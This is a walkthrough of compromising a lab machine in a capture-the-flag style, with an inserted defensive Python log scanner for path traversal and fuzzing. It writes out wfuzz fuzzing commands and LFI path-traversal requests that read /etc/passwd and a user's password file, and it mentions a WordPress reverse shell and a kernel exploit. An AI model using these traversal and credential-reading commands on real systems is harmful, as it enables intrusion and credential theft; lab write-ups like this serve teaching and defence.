ipaddress: 192.168.91.131

### information_gathering

open-port: 22 80

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609491865941-5a6ddb24-04fa-4d9e-97ec-8eebc7c6cf35.png#align=left&display=inline&height=52&margin=%5Bobject%20Object%5D&name=image.png&originHeight=103&originWidth=623&size=29532&status=done&style=none&width=311.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609522832910-12605d75-4865-42eb-ba0f-fe084f88f36d.png#align=left&display=inline&height=73&margin=%5Bobject%20Object%5D&name=image.png&originHeight=145&originWidth=560&size=37406&status=done&style=none&width=280)

```
http://192.168.91.131/dev
http://192.168.91.131/devwordpress
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609522888474-56a18e0e-5445-4e7d-867e-604fc9cf4d51.png#align=left&display=inline&height=152&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=709&size=36059&status=done&style=none&width=354.5)

The dev page hints that we need to brute-force (guess) our way forward.

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609492262542-1f1b4202-6264-4b76-bdf8-fd176691fd06.png#align=left&display=inline&height=122&margin=%5Bobject%20Object%5D&name=image.png&originHeight=243&originWidth=1137&size=24277&status=done&style=none&width=568.5)

When I use the dirb command I find this:

```
dirb http://192.168.91.131 -X .txt
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523023646-c5decef8-7bbb-4944-865e-c038fbc12bfa.png#align=left&display=inline&height=89&margin=%5Bobject%20Object%5D&name=image.png&originHeight=178&originWidth=485&size=28952&status=done&style=none&width=242.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523061175-626174a4-f30e-4fbf-8079-e43af1febfc8.png#align=left&display=inline&height=185&margin=%5Bobject%20Object%5D&name=image.png&originHeight=370&originWidth=652&size=35214&status=done&style=none&width=326)
[https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web](https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web) see the location.txt and you will get your next move // so I went to the GitHub page to find something:

```
COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something
COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something
COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something
```

### Establish a foothold

Okay, next use the wfuzz command together with location.txt to fuzz:

1. `wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hc=404,406,502 --hw=12 http://192.168.91.131/index.php?FUZZ=testing` // finds the file parameter
2. Pass location.txt to the file parameter

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523301280-12191cf1-dbcf-43ad-a128-3da20c5cc988.png#align=left&display=inline&height=476&margin=%5Bobject%20Object%5D&name=image.png&originHeight=952&originWidth=736&size=283653&status=done&style=none&width=368)

The hint says to find the file that takes secrettier360 as a parameter:

```
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hc=404,406,502 http://192.168.91.131/FUZZ.php?secrettier360=testing
```

// finds that image.php exists

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523464353-baca0744-7269-45ca-8731-b8cc4197ceaa.png#align=left&display=inline&height=52&margin=%5Bobject%20Object%5D&name=image.png&originHeight=104&originWidth=633&size=19529&status=done&style=none&width=316.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523492275-ac592565-700b-4b42-b9d9-fc4a33dcb1ab.png#align=left&display=inline&height=445&margin=%5Bobject%20Object%5D&name=image.png&originHeight=889&originWidth=664&size=272928&status=done&style=none&width=332)

```
http://192.168.91.131/image.php?secrettier360=secret
```

So an LFI vulnerability is found here. Using it to read wp-config.php did not succeed, but note the hint on the target's login page:

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523628830-e5a63fb1-18c8-4cb0-80b7-e08106817ccd.png#align=left&display=inline&height=138&margin=%5Bobject%20Object%5D&name=image.png&originHeight=275&originWidth=462&size=86758&status=done&style=none&width=231)

So the username is: "find password.txt file in my directory". Let's try to find every existing username and then check each one for a password.txt file:

```
curl http://192.168.91.131/image.php?secrettier360=../../../etc/passwd | grep /home > user.txt
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495203441-81c7890b-3519-4494-b64d-5c014e8a97c4.png#align=left&display=inline&height=36&margin=%5Bobject%20Object%5D&name=image.png&originHeight=71&originWidth=598&size=20761&status=done&style=none&width=299)

Finally, password.txt was found under saket; the password is follow_the_ippsec.

[http://192.168.91.131/image.php?secrettier360=../../../home/saket/password.txt](http://192.168.91.131/image.php?secrettier360=../../../home/saket/password.txt)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523754181-1291a063-feda-4065-b6f4-18b378cefcd6.png#align=left&display=inline&height=479&margin=%5Bobject%20Object%5D&name=image.png&originHeight=958&originWidth=769&size=350205&status=done&style=none&width=384.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609494848175-cc168ec1-aa9a-47ca-add9-c8e812f3c915.png#align=left&display=inline&height=500&margin=%5Bobject%20Object%5D&name=image.png&originHeight=999&originWidth=1899&size=870610&status=done&style=none&width=949.5)

So the username is admin and the password is follow_the_ippsec. After trying saket / follow_the_ippsec over SSH and failing, logging in to WordPress as admin with the password follow_the_ippsec succeeded. Not all theme files can be modified directly, but a Google search turned up that [wordpress/wp-content/themes/twentynineteen/secret.php](http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php) is writable, and a reverse shell was obtained.
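The two techniques above, wordlist enumeration with dirb/wfuzz and the `secrettier360` path-traversal read of `/etc/passwd` and `/home/saket/password.txt`, both leave a distinctive footprint in the web server's access log. The following is an added example, not part of the original writeup and not code from the target machine: it runs over a few constructed Apache-style log lines (addresses from the 192.0.2.0/24 documentation range, parameter names borrowed from the writeup), flags query values that try to leave their directory even when double percent-encoded, lists source addresses producing many 404s (the signature of a wordlist scan), and shows the mitigation side with a `safe_resolve` helper that pins a requested file to a base directory. Function names, the log lines, and the `/var/www/html/pages` base directory are all assumptions made for the example.

```python
"""Added example (not from the original writeup): defender-side checks for
path traversal / LFI and for wordlist scanning, run over constructed log lines.
Nothing here contacts 192.168.91.131 or any other host."""
import os
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines in Apache combined format. The query strings
# mirror the writeup: a secrettier360 value used for traversal (plain, double
# percent-encoded, and absolute) beside harmless values, plus a burst of 404s
# from one address as a dirb/wfuzz run would produce.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2021:12:00:00 +0000] "GET /image.php?secrettier360=../../../etc/passwd HTTP/1.1" 200 1423
192.0.2.10 - - [01/Jan/2021:12:00:01 +0000] "GET /image.php?secrettier360=secret HTTP/1.1" 200 311
192.0.2.11 - - [01/Jan/2021:12:00:02 +0000] "GET /image.php?secrettier360=..%252f..%252fetc%2fpasswd HTTP/1.1" 200 1423
192.0.2.12 - - [01/Jan/2021:12:00:03 +0000] "GET /index.php?file=location.txt HTTP/1.1" 200 98
192.0.2.13 - - [01/Jan/2021:12:00:04 +0000] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 1423
192.0.2.20 - - [01/Jan/2021:12:00:05 +0000] "GET /admin.txt HTTP/1.1" 404 275
192.0.2.20 - - [01/Jan/2021:12:00:05 +0000] "GET /backup.txt HTTP/1.1" 404 275
192.0.2.20 - - [01/Jan/2021:12:00:06 +0000] "GET /secret.txt HTTP/1.1" 404 275
192.0.2.20 - - [01/Jan/2021:12:00:06 +0000] "GET /dev HTTP/1.1" 200 131
"""

# client ip, ident, user, [timestamp], "METHOD path PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) \S+')


def parse_line(line):
    """Return (ip, method, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method, path, int(status)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that ..%252f.. is seen as ../.. ."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True when a parameter value tries to leave its intended directory:
    a '..' path segment, an absolute path, or an embedded NUL byte."""
    v = fully_decode(value).replace("\\", "/")
    if "\x00" in v:
        return True
    return v.startswith("/") or ".." in v.split("/")


def scan_access_log(lines):
    """Flag requests whose query parameters look like LFI / path traversal.
    Returns a list of (ip, parameter name, decoded value)."""
    hits = []
    for line in lines.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _method, path, _status = parsed
        for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            if is_traversal(value):
                hits.append((ip, name, fully_decode(value)))
    return hits


def fuzz_sources(lines, threshold=3):
    """Addresses with at least `threshold` 404 responses: the footprint of a
    wordlist scan such as the dirb/wfuzz runs in the writeup."""
    not_found = Counter()
    for line in lines.splitlines():
        parsed = parse_line(line)
        if parsed is not None and parsed[3] == 404:
            not_found[parsed[0]] += 1
    return sorted(ip for ip, n in not_found.items() if n >= threshold)


def safe_resolve(base_dir, requested):
    """Mitigation side: resolve `requested` under base_dir and return the real
    path, or None if the resolved path escapes base_dir (the check a
    file-serving endpoint like image.php should perform before opening)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
    print("wordlist-scan sources:", fuzz_sources(SAMPLE_LOG))
    print(safe_resolve("/var/www/html/pages", "secret.txt"))
    print(safe_resolve("/var/www/html/pages", "../../../etc/passwd"))
```

The decode loop matters: a single `unquote` would leave `..%2f..%2f` untouched, and a naive substring check for `../` would miss it. `safe_resolve` relies on `os.path.join` discarding the base when the requested name is absolute, so `/etc/passwd` ends up outside the base and is rejected by the same prefix comparison as the `..` case.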
![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495329269-9bd6ca72-60ec-4068-94a8-33e5d3d23298.png#align=left&display=inline&height=435&margin=%5Bobject%20Object%5D&name=image.png&originHeight=869&originWidth=1920&size=127667&status=done&style=none&width=960)

[http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php](http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495575987-bb3ec8d6-24c5-4d28-a13e-22990f9a10ee.png#align=left&display=inline&height=62&margin=%5Bobject%20Object%5D&name=image.png&originHeight=124&originWidth=1029&size=15471&status=done&style=none&width=514.5)

okay~

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495777663-ea147342-9d4c-48c3-bcf6-7005664c8786.png#align=left&display=inline&height=101&margin=%5Bobject%20Object%5D&name=image.png&originHeight=202&originWidth=757&size=50154&status=done&style=none&width=378.5)

### Privilege escalation

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495907500-0d8f4bd5-9aee-429a-be07-a626dcbfdcfa.png#align=left&display=inline&height=113&margin=%5Bobject%20Object%5D&name=image.png&originHeight=225&originWidth=564&size=42153&status=done&style=none&width=282)

wordpress / yourpasswordhere, but not useful~

```
cat /home/*
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609496035688-a6509703-08a8-42c4-bfb4-ebb905da2415.png#align=left&display=inline&height=48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=95&originWidth=403&size=10753&status=done&style=none&width=201.5)

af3c658dcf9d7190da3153519c003456

After checking with the les.sh script, kernel privilege escalation succeeded.

```
searchsploit 45010
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609524276659-e680d908-52b5-4697-974e-57ff8a09a266.png#align=left&display=inline&height=19&margin=%5Bobject%20Object%5D&name=image.png&originHeight=38&originWidth=1199&size=9870&status=done&style=none&width=599.5)
![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609497718668-30ab4466-ca2b-4022-adbf-c56f426bbfca.png#align=left&display=inline&height=37&margin=%5Bobject%20Object%5D&name=image.png&originHeight=74&originWidth=679&size=10365&status=done&style=none&width=339.5)